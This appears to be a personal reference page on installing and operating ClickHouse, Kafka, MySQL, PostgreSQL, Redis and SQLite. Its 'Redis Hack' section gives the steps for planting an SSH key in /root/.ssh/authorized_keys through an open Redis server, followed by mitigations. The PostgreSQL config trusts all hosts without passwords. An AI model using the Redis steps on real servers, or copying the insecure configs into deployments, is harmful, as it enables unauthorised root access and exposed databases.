Data
- 1: ClickHouse
- 1.1: Install ClickHouse
- 2: MQ
- 2.1: Kafka
- 3: MySQL
- 3.1: Install MySQL
- 4: PostgreSQL
- 5: Redis
- 5.1: Redis Cli
- 5.2: Redis Deploy
- 5.3: Redis Hack
- 5.4: Redis Persistence
- 5.5: Redis Sentinel
- 5.6: Redis Type
- 6: Sqlite
1 - ClickHouse
1.1 - Install ClickHouse
docker
docker run -d --name clickhouse \
--ulimit nofile=262144:262144 \
-p 8123:8123 -p9000:9000 \
-e CLICKHOUSE_DB=test \
-e CLICKHOUSE_USER=root -e CLICKHOUSE_PASSWORD=root \
-e CLICKHOUSE_DEFAULT_ACCESS_MANAGEMENT=1 \
clickhouse/clickhouse-server
echo 'SELECT version()' | curl 'http://localhost:18123/' --data-binary @-
2 - MQ
2.1 - Kafka
install
# https://github.com/provectus/kafka-ui
docker run -p 8080:8080 \
-e KAFKA_CLUSTERS_0_NAME=local \
-e KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS=kafka:9092 \
-d provectuslabs/kafka-ui
3 - MySQL
3.1 - Install MySQL
Container
docker run -d -it --name mysql57 \
-e MYSQL_ROOT_PASSWORD=root \
-p 3306:3306 \
mysql:5.7
4 - PostgreSQL
install
container
# -e POSTGRES_USER=postgres \
# -e POSTGRES_DB=postgres \
docker run -d -it --name postgres15 \
-e POSTGRES_PASSWORD=postgres \
-v ${PWD}/postgresql.conf:/var/lib/postgresql/data/postgresql.conf \
-v ${PWD}/pg_hba.conf:/var/lib/postgresql/data/pg_hba.conf \
-v ${PWD}/data:/var/lib/postgresql/data \
-p 5432:5432 \
postgres:15
docker exec -it postgres15 psql -hlocalhost -U postgres
GRANT ALL PRIVILEGES ON DATABASE postgres to postgres;
ALTER SCHEMA public OWNER to postgres;
GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO postgres;
GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO postgres;
select name, setting from pg_settings where category = 'File Locations' ;
/var/lib/postgresql/data/pg_hba.conf
local all all trust
host all all 127.0.0.1/32 trust
host all all ::1/128 trust
local replication all trust
host replication all 127.0.0.1/32 trust
host replication all ::1/128 trust
host all all 0.0.0.0/0 trust
/var/lib/postgresql/data/postgresql.conf
listen_addresses = '*'
#port = 5432 # (change requires restart)
max_connections = 100
shared_buffers = 128MB
dynamic_shared_memory_type = posix
max_wal_size = 1GB
min_wal_size = 80MB
log_timezone = 'Etc/UTC'
datestyle = 'iso, mdy'
timezone = 'Etc/UTC'
lc_messages = 'en_US.utf8'
lc_monetary = 'en_US.utf8'
lc_numeric = 'en_US.utf8'
lc_time = 'en_US.utf8'
default_text_search_config = 'pg_catalog.english'
5 - Redis
5.1 - Redis Cli
事务
multi
开启事务exec
提交事务,执行队列中的所有命令discard
放弃执行事务,清空事务队列watch key1 [key2...]
监听某个键,如果在exec之前被更改了,则放弃执行事务unwatch [key1...]
取消目前对键的监视,客户端断开连接也会取消监视
发布与订阅
subscribe key1 [key2...]
订阅频道,支持通配符的版本psubscribe
unsubscribe key1 [key2...]
取消订阅频道,支持通配符的版本punsubscribe
publish key value [key2...]
发布消息到频道pubsub
自省
类型操作
keys *
string
set k v
# string
type k
get k
# return old value
getset k v
mset k1 v1 k2 v2
mget k1 k2
# set if not exsit
msetnx k1 v1 k2 v2
# append to the tail
append k v
# string legnth
strlen k
# increment a number string, k++
incr k
decr k
# k += d
incrby k d
decrby k d
# 覆写,从偏移量offset 开始
setrange k offset v
# 子串,含两端
getrange k start end
# 设置或清除指定偏移量上的位
setbit k offset v
setnx k v
# expire in seconds
set k v ex seconds nx
list
# 将一个或多个值 value插入到列表 key 的表头
lpush k v1 v2
# push if exist
lpushx k v
# 返回列表 key 中指定区间内的元素,区间以偏移量 start=0 和 end=-1 指定
lrange key start end
# 移除并返回列表 key 的头元素
lpop k
llen k
# 从头部开始移除列表中与参数 value 相等的元素
lrem k count v
lset k index v
# 返回列表 key 中,下标为 index 的元素
lindex k index
# 修剪
ltrim k start end
# 将值 value 插入到列表 key 当中,位于值 p 之前或之后 after
linsert k before p v
# 将一个或多个值 value插入到列表 key 的表尾
rpush k v1 v2
rpushx k v
rpop
# 在一个原子时间内,执行两个动作:
# 将列表 src 中的尾元素弹出返回,并插入到列表 dest
rpoplpush src dest
hash
hset k f v
# 将哈希表 key 中的域 field 的值设置为 value ,当且仅当域 field 不存在。
hsetnx k f v
hexists k f
hlen k
# 删除哈希表 key 中的一个或多个指定域,不存在的域将被忽略。
hdel k f1 f2
# ++
hincrby k f increment
hgetall k
# 返回哈希表 key 中的所有域
hkeys k
# 返回哈希表 key 中所有域的值
hvals k
# 同时将多个 field-value (域-值)对设置到哈希表 key 中
hmset k f1 v1 f2 v2
set
# 已经存在于集合的 member 元素将被忽略。
sadd k m1 m2
smembers k
# 集合中元素的数量
scard k
# 判断 member 元素是否集合 key 的成员
sismember k m
# 移除并返回集合中的一个随机元素
spop k
# 返回集合中的一个随机元素
srandmember k
# 移除集合 key 中的一个或多个member 元素,不存在的 member 元素会被忽略
srem k m1 m2
# 原子性操作 将 member 元素从 source 集合移动到 destination 集合
smove src dest m
sdiff set1 set2
sdiffstore diffSet set1 set2
sunion set1 set2
sinterstore interSet set1 set2
zset
zadd k score1 m1 score2 m2
zcard k
zincrby k increment m
# 返回有序集 key 中, score 值在 min 和 max 之间
# (默认包括 score 值等于 min 或 max )的成员的数量
zcount k min max
# 返回有序集 key 中,指定区间内的成员
# 其中成员的位置按 score 值递增(从小到大)来排序。
zrange k start end withscores
# 按 score 值递减(从大到小)
zrevrange k start end withscores
# 返回所有 score 值介于 min 和 max 之间
# (包括等于 min 或 max )的成员
zrangebyscore k min max withscores limit offset count
# 返回有序集 key 中成员 member 的排名
# 其中有序集成员按score 值递增(从小到大)顺序排列。
zrank k m
zrevrank k m
# 返回有序集 key 中,成员 member 的 score 值。
zscore k m
zrem k m1 m2
# 移除有序集 key 中,指定排名(rank)区间内的所有成员
zremrangebyrank k start end
zremrangebyscore k min max
info
info memory
used_memory, include used swap space
used_memory_human
used_memory_rss, same as top
or ps
, exclude used swap space
mem_fragmentation_ratio same as used_memory_rss / used_memory
fragmentation ratio
health value is 1.03 for jemalloc
mem_allocator libc, jemalloc or tcmalloc
5.2 - Redis Deploy
container
docker run -it -d --name redis -p 6379:6379 redis
sentinel
localhost
config set protected-mode no
multi master (3 master, 3 slave, and 3 sentinel)
cat << EOF > redis.conf
port 7000
daemonize yes
cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
mkdir 7000 7001 7002 7003 7004 7005
cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf
export redis_server='../redis/src/redis-server'
$redis_server 7000/redis.conf
$redis_server 7001/redis.conf
$redis_server 7002/redis.conf
$redis_server 7003/redis.conf
$redis_server 7004/redis.conf
$redis_server 7005/redis.conf
# three master & three slave
../redis/src/redis-trib.rb create --replicas 1 127.0.0.1:7000 127.0.0.1:7001 \
127.0.0.1:7002 127.0.0.1:7003 127.0.0.1:7004 127.0.0.1:7005
cat << EOF > sentinel.conf
port 26379
daemonize yes
sentinel monitor mymaster1 127.0.0.1 %port1 2
sentinel down-after-milliseconds mymaster1 60000
sentinel failover-timeout mymaster1 180000
sentinel parallel-syncs mymaster1 1
sentinel monitor mymaster2 127.0.0.1 %port2 2
sentinel down-after-milliseconds mymaster2 60000
sentinel failover-timeout mymaster2 180000
sentinel parallel-syncs mymaster2 1
sentinel monitor mymaster3 127.0.0.1 %port3 2
sentinel down-after-milliseconds mymaster3 60000
sentinel failover-timeout mymaster3 180000
sentinel parallel-syncs mymaster3 1
EOF
cat sentinel.conf | sed s/26379/26379/g | sed 's/%port1/1/g' > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g | sed 's/%port2//g' > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g | sed 's/%port3//g' > sentinel_2.conf
export redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel
single master(1 master, 5 slave, and 3 sentinel)
cat << EOF > redis.conf
port 7000
daemonize yes
protected-mode no
# cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
mkdir 7000 7001 7002 7003 7004 7005
cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf
export redis_server='../redis/src/redis-server'
# master
$redis_server 7000/redis.conf
# slave
$redis_server 7001/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7002/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7003/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7004/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7005/redis.conf --slaveof 127.0.0.1 7000
cat << EOF > sentinel.conf
port 26379
daemonize yes
protected-mode no
sentinel monitor mymaster 127.0.0.1 7000 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1
EOF
cat sentinel.conf | sed s/26379/26379/g > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g > sentinel_2.conf
redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel
5.3 - Redis Hack
Remote login
How to replay
ssh-keygen –t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
$ cat foo | redis-cli -h $remote_ip -x set crack
$ redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save
How to avoid
# redis.conf
# disable to change dbfilename via remote connetion
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
requirepass mypassword
bind 127.0.0.1
groupadd -r redis && useradd -r -g redis redis
5.4 - Redis Persistence
persistence
RDB
fork sub process periodically and dump to a single file
AOF, appended only file
log every writer and delete records
# after 300s, dump if at least 10 key changed
save 300 10
# aof, always no
# every second
appendfsync everysec
# grow 100% then rewrite
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
5.5 - Redis Sentinel
sentinel
ping
info replication
info server
info sentinel
sentinel auth-pass <name> <password>
sentinel masters
sentinel master <name>
sentinel slaves <name>
# 返回指定master的ip和端口
# 正在进行failover或者failover已经完成,将显示被提升为master的slave的ip和端口
sentinel get-master-addr-by-name <name>
# 重置名字匹配该正则表达式的所有的master的状态信息
sentinel reset <pattern>
# 执行failover,无需其他sentinel同意
sentinel failover <master name>
# 监听一个新的master
sentinel monitor <name> <ip> <port> <quorum>
# 放弃对某个master的监听
sentinel remove <name>
# 改变指定master的配置,支持多个<option> <value>
sentinel set <name> <option> <value>
conf
# 26379
redis-sentinel /path/to/sentinel.conf
redis-server /path/to/sentinel.conf --sentinel
sentinel.conf
sentinel monitor mymaster 127.0.0.1 6379 2 sentinel down-after-milliseconds mymaster 60000 sentinel failover-timeout mymaster 180000 sentinel parallel-syncs mymaster 1
sentinel monitor resque 192.168.1.3 6380 4 sentinel down-after-milliseconds resque 10000 sentinel failover-timeout resque 180000 sentinel parallel-syncs resque 5
sentinel monitor mymaster 127.0.0.1 6379 2
2 当集群中有2个sentinel认为master死了时,才能真正认为该master已经不可用了
sentinel <option_name> <master_name> <option_value>
所有的配置都可以在运行时用命令SENTINEL SET command动态修改。
down-after-milliseconds
sentinel会向master发送心跳PING来确认master是否存活,如果master在“一定时间范围”内不回应PONG 或者是回复了一个错误消息,那么这个sentinel会主观地(单方面地)认为这个master已经不可用了
parallel-syncs
在发生failover主备切换时,这个选项指定了最多可以有多少个slave同时对新的master进行同步,这个数字越小,完成failover所需的时间就越长,但是如果这个数字越大,就意味着越多的slave因为replication而不可用。可以通过将这个值设为 1 来保证每次只有一个slave处于不能处理命令请求的状态。
sentinel对于不可用有两种不同的看法,一个叫主观不可用(SDOWN),另外一个叫客观不可用(ODOWN)。SDOWN是sentinel自己主观上检测到的关于master的状态,ODOWN需要一定数量的sentinel达成一致意见才能认为一个master客观上已经宕掉,各个sentinel之间通过命令SENTINEL is_master_down_by_addr来获得其它sentinel对master的检测结果。
min-slaves-to-write 1 min-slaves-max-lag 10
当一个redis是master时,如果它不能向至少一个slave写数据(上面的min-slaves-to-write指定了slave的数量),它将会拒绝接受客户端的写请求。由于复制是异步的,master无法向slave写数据意味着slave要么断开连接了,要么不在指定时间内向master发送同步数据的请求了(上面的min-slaves-max-lag指定了这个时间)
向sentinel订阅消息
psubscribe *
psubscribe sdown
<instance-type> <name> <ip> <port> @ <master-name> <master-ip> <master-port>
所有收到的消息的消息格式
+reset-master <instance details> -- 当master被重置时.
+slave <instance details> -- 当检测到一个slave并添加进slave列表时.
+failover-state-reconf-slaves <instance details> -- Failover状态变为reconf-slaves状态时
+failover-detected <instance details> -- 当failover发生时
+slave-reconf-sent <instance details> -- sentinel发送SLAVEOF命令把它重新配置时
+slave-reconf-inprog <instance details> -- slave被重新配置为另外一个master的slave,但数据复制还未发生时。
+slave-reconf-done <instance details> -- slave被重新配置为另外一个master的slave并且数据复制已经与master同步时。
-dup-sentinel <instance details> -- 删除指定master上的冗余sentinel时 (当一个sentinel重新启动时,可能会发生这个事件).
+sentinel <instance details> -- 当master增加了一个sentinel时。
+sdown <instance details> -- 进入SDOWN状态时;
-sdown <instance details> -- 离开SDOWN状态时。
+odown <instance details> -- 进入ODOWN状态时。
-odown <instance details> -- 离开ODOWN状态时。
+new-epoch <instance details> -- 当前配置版本被更新时。
+try-failover <instance details> -- 达到failover条件,正等待其他sentinel的选举。
+elected-leader <instance details> -- 被选举为去执行failover的时候。
+failover-state-select-slave <instance details> -- 开始要选择一个slave当选新master时。
no-good-slave <instance details> -- 没有合适的slave来担当新master
selected-slave <instance details> -- 找到了一个适合的slave来担当新master
failover-state-send-slaveof-noone <instance details> -- 当把选择为新master的slave的身份进行切换的时候。
failover-end-for-timeout <instance details> -- failover由于超时而失败时。
failover-end <instance details> -- failover成功完成时。
switch-master <master name> <oldip> <oldport> <newip> <newport> -- 当master的地址发生变化时。通常这是客户端最感兴趣的消息了。
+tilt -- 进入Tilt模式。
-tilt -- 退出Tilt模式。
5.6 - Redis Type
redisObject
Redis 类型系统的核心,数据库中的每个键、值,以及Redis 本身处理的参数,都表示为这种数据类型
// server.h
/* The actual Redis Object */
#define OBJ_STRING 0 /* String object. */
#define OBJ_LIST 1 /* List object. */
#define OBJ_SET 2 /* Set object. */
#define OBJ_ZSET 3 /* Sorted set object. */
#define OBJ_HASH 4 /* Hash object. */
/* Objects encoding. Some kind of objects like Strings and Hashes can be
* internally represented in multiple ways. The 'encoding' field of the object
* is set to one of this fields for this object. */
#define OBJ_ENCODING_RAW 0 /* Raw representation */ // 编码为字符串
#define OBJ_ENCODING_INT 1 /* Encoded as integer */ // 编码为整数
#define OBJ_ENCODING_HT 2 /* Encoded as hash table */ // 编码为哈希表
#define OBJ_ENCODING_ZIPMAP 3 /* Encoded as zipmap */
#define OBJ_ENCODING_LINKEDLIST 4 /* No longer used: old list encoding. */
#define OBJ_ENCODING_ZIPLIST 5 /* Encoded as ziplist */ // 编码为压缩列表
#define OBJ_ENCODING_INTSET 6 /* Encoded as intset */ // 编码为整数集合
#define OBJ_ENCODING_SKIPLIST 7 /* Encoded as skiplist */ // 编码为跳跃表
#define OBJ_ENCODING_EMBSTR 8 /* Embedded sds string encoding */
#define OBJ_ENCODING_QUICKLIST 9 /* Encoded as linked list of ziplists */
#define OBJ_ENCODING_STREAM 10 /* Encoded as a radix tree of listpacks */
typedef struct redisObject {
// 数据类型,OBJ_STRING等
unsigned type:4;
// 编码方式,OBJ_ENCODING_RAW等
unsigned encoding:4;
// #define LRU_BITS 24
// LRU 时间
unsigned lru:LRU_BITS; /* LRU time (relative to global lru_clock) or
* LFU data (least significant 8 bits frequency
* and most significant 16 bits access time). */
// 引用计数
int refcount;
// 指向对象的值
void *ptr;
} robj;
类型自省
type keyname
type REDIS_STRING, REDIS_LIST, REDIS_HASH, REDIS_SET or REDIS_ZSET,
object encoding keyname
encoding int, embstr or raw for REDIS_STRING,
object idletime keyname (unit is second)
lru access time
object refcount keyname
only for number-format string, shared object ref count
String
Simple Dynamic String
struct sdshdr {
int len;
int free;
char buf[];
};
REDIS_STRING
int, 8 bytes long
embstr <=39 bytes readonly string
raw > 39 bytes
6 - Sqlite
cmd
.help
.databases
.tables
Sample
-- jdbc:mysql://localhost:3306?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
-- jdbc:sqlite:test.sqlite
create database test;
create table student (
name varchar(100) not null primary key,
class varchar(100),
gender varchar(100),
age smallint default -1,
height decimal(16,6),
weight decimal(16,6)
);
insert into student values
('john','a','male',27,173,78),
('paul','a','male',27,179,73),
('george','b','male',25,182,69),
('ringer','c','male',24,169,59),
('yoko','a','female',33,165,53),
('rita','b','female',25,163,57),
('lucy','c','female',28,175,60);
date,subject,sdutent_name,score
create table score (
`date` date not null,
subject varchar(100),
student_name varchar(100),
score decimal(16,6)
);
insert into score values
('2020-08-04','chinese','john',60),
('2020-08-04','chinese','paul',75),
('2020-08-04','chinese','george',55),
('2020-08-04','chinese','ringer',81),
('2020-08-04','chinese','yoko',95),
('2020-08-04','chinese','rita',72),
('2020-08-04','chinese','lucy',88),
('2020-08-04','math','john',96),
('2020-08-04','math','paul',100),
('2020-08-04','math','george',65),
('2020-08-04','math','ringer',87),
('2020-08-04','math','yoko',77),
('2020-08-04','math','rita',85),
('2020-08-04','math','lucy',98),
('2020-08-04','pe','john',82),
('2020-08-04','pe','paul',97),
('2020-08-04','pe','george',71),
('2020-08-04','pe','ringer',100),
('2020-08-04','pe','yoko',85),
('2020-08-04','pe','rita',52),
('2020-08-04','pe','lucy',75),
('2020-08-05','chinese','john',64),
('2020-08-05','chinese','paul',80),
('2020-08-05','chinese','george',42),
('2020-08-05','chinese','ringer',91),
('2020-08-05','chinese','yoko',100),
('2020-08-05','chinese','rita',79),
('2020-08-05','chinese','lucy',82),
('2020-08-05','math','john',91),
('2020-08-05','math','paul',90),
('2020-08-05','math','george',73),
('2020-08-05','math','ringer',76),
('2020-08-05','math','yoko',87),
('2020-08-05','math','rita',81),
('2020-08-05','math','lucy',100),
('2020-08-05','pe','john',88),
('2020-08-05','pe','paul',100),
('2020-08-05','pe','george',67),
('2020-08-05','pe','ringer',91),
('2020-08-05','pe','yoko',92),
('2020-08-05','pe','rita',60),
('2020-08-05','pe','lucy',73);